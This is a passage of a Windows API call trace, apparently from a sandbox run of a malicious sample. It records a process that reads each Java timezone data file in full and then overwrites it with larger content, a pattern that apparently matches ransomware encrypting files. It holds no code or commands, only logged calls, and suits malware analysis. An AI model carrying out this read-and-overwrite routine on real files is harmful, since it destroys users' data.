SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.938] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3a4 [0120.938] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0120.939] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0120.939] ReleaseMutex (hMutex=0x168) returned 1 [0120.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winamac", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0120.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winamac", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Winamac", lpUsedDefaultChar=0x0) returned 7 [0120.939] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x3a4, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2b1f2bc*=0x3a4, lpOverlapped=0x0) returned 1 [0124.266] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0124.266] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x92c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x92c, lpOverlapped=0x0) returned 1 [0124.266] CloseHandle (hObject=0x1f0) returned 1 [0124.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.491] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0127.491] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb9 [0127.491] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0127.491] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.491] ReleaseMutex (hMutex=0x168) returned 1 [0127.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lima", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0127.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lima", cchWideChar=4, lpMultiByteStr=0x1f7acb4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lima", lpUsedDefaultChar=0x0) returned 4 [0127.491] ReadFile (in: hFile=0x204, lpBuffer=0x1edfdb8, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1edfdb8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb9, lpOverlapped=0x0) returned 1 [0127.492] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0127.492] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x641, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x641, lpOverlapped=0x0) returned 1 [0127.493] CloseHandle (hObject=0x204) returned 1 [0127.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.494] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0127.494] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4c0 [0127.494] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0127.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.494] ReleaseMutex (hMutex=0x168) returned 1 [0127.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Menominee", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0127.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Menominee", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Menominee", lpUsedDefaultChar=0x0) returned 9 [0127.495] ReadFile (in: hFile=0x204, lpBuffer=0x2882dd8, nNumberOfBytesToRead=0x4c0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesRead=0x2b1f2bc*=0x4c0, lpOverlapped=0x0) returned 1 [0127.497] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0127.498] WriteFile (in: hFile=0x204, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0xa48, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa48, lpOverlapped=0x0) returned 1 [0127.498] CloseHandle (hObject=0x204) returned 1 [0127.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.501] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0127.501] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x788 [0127.501] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0127.501] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.501] ReleaseMutex (hMutex=0x168) returned 1 [0127.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Montreal", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0127.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Montreal", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Montreal", lpUsedDefaultChar=0x0) returned 8 [0127.501] ReadFile (in: hFile=0x204, lpBuffer=0x2882dd8, nNumberOfBytesToRead=0x788, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesRead=0x2b1f2bc*=0x788, lpOverlapped=0x0) returned 1 [0127.505] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0127.505] WriteFile (in: hFile=0x204, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xd10, lpOverlapped=0x0) returned 1 [0127.505] CloseHandle (hObject=0x204) returned 1 [0127.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.621] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.621] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4fc [0130.621] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.621] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.621] ReleaseMutex (hMutex=0x168) returned 1 [0130.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Center", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Center", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Center", lpUsedDefaultChar=0x0) returned 6 [0130.621] ReadFile (in: hFile=0x204, lpBuffer=0x1f3e908, nNumberOfBytesToRead=0x4fc, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e908*, lpNumberOfBytesRead=0x2b1f2bc*=0x4fc, lpOverlapped=0x0) returned 1 [0130.667] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.667] WriteFile (in: hFile=0x204, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa84, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa84, lpOverlapped=0x0) returned 1 [0130.667] CloseHandle (hObject=0x204) returned 1 [0130.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.669] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.669] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x129 [0130.669] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.669] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.669] ReleaseMutex (hMutex=0x168) returned 1 [0130.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Porto_Velho", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Porto_Velho", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Porto_Velho", lpUsedDefaultChar=0x0) returned 11 [0130.670] ReadFile (in: hFile=0x204, lpBuffer=0x1f21f68, nNumberOfBytesToRead=0x129, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f21f68*, lpNumberOfBytesRead=0x2b1f2bc*=0x129, lpOverlapped=0x0) returned 1 [0130.671] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.671] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6b1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6b1, lpOverlapped=0x0) returned 1 [0130.671] CloseHandle (hObject=0x204) returned 1 [0130.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.673] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.673] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x131 [0130.673] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.673] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.673] ReleaseMutex (hMutex=0x168) returned 1 [0130.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rio_Branco", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rio_Branco", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rio_Branco", lpUsedDefaultChar=0x0) returned 10 [0130.674] ReadFile (in: hFile=0x204, lpBuffer=0x1f21f68, nNumberOfBytesToRead=0x131, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f21f68*, lpNumberOfBytesRead=0x2b1f2bc*=0x131, lpOverlapped=0x0) returned 1 [0130.675] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.675] WriteFile (in: hFile=0x204, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6b9, lpOverlapped=0x0) returned 1 [0130.675] CloseHandle (hObject=0x204) returned 1 [0130.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.676] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.676] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7d0 [0130.676] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.677] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.677] ReleaseMutex (hMutex=0x168) returned 1 [0130.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Johns", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Johns", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="St_Johns", lpUsedDefaultChar=0x0) returned 8 [0130.677] ReadFile (in: hFile=0x204, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x7d0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2b1f2bc*=0x7d0, lpOverlapped=0x0) returned 1 [0130.679] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.679] WriteFile (in: hFile=0x204, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xd58, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xd58, lpOverlapped=0x0) returned 1 [0130.680] CloseHandle (hObject=0x204) returned 1 [0130.680] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.681] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.681] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4a4 [0130.681] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.682] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.682] ReleaseMutex (hMutex=0x168) returned 1 [0130.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thunder_Bay", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thunder_Bay", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thunder_Bay", lpUsedDefaultChar=0x0) returned 11 [0130.682] ReadFile (in: hFile=0x204, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4a4, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2b1f2bc*=0x4a4, lpOverlapped=0x0) returned 1 [0130.702] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.702] WriteFile (in: hFile=0x204, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xa2c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa2c, lpOverlapped=0x0) returned 1 [0130.702] CloseHandle (hObject=0x204) returned 1 [0130.702] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.704] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.704] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x42c [0130.704] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.704] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.705] ReleaseMutex (hMutex=0x168) returned 1 [0130.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellowknife", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yellowknife", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yellowknife", lpUsedDefaultChar=0x0) returned 11 [0130.705] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x42c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x42c, lpOverlapped=0x0) returned 1 [0130.713] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.713] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9b4, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9b4, lpOverlapped=0x0) returned 1 [0130.713] CloseHandle (hObject=0x204) returned 1 [0130.713] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.717] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.717] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41 [0130.717] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.717] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.718] ReleaseMutex (hMutex=0x168) returned 1 [0130.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rothera", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rothera", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rothera", lpUsedDefaultChar=0x0) returned 7 [0130.718] ReadFile (in: hFile=0x1d4, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2b1f2bc*=0x41, lpOverlapped=0x0) returned 1 [0130.719] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.719] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0130.719] CloseHandle (hObject=0x1d4) returned 1 [0130.719] CreateFileW 